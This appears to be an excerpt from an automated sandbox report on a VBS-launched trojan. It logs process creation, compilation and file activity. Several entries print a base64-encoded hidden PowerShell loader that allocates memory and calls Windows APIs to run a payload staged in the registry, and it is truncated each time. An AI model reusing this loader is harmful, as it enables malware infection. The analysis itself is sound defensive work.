cAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wxgbxjsa.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES330D.tmp" "c:\Users\user\AppData\Local\Temp\CSCED2B87455DE24E4084C3BB361169C34B.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ginqqgem.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA37.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CEBFB2B5FB1400592E8D3F6A040AE46.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rf0jcwxf.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0A3.tmp" "c:\Users\user\AppData\Local\Temp\CSC1F7F6E38280547C88EA9F93164256468.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wxgbxjsa.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ginqqgem.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES330D.tmp" "c:\Users\user\AppData\Local\Temp\CSCED2B87455DE24E4084C3BB361169C34B.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA37.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CEBFB2B5FB1400592E8D3F6A040AE46.TMP"
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220126 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2udcow1.gts.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@36/40@1/2
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
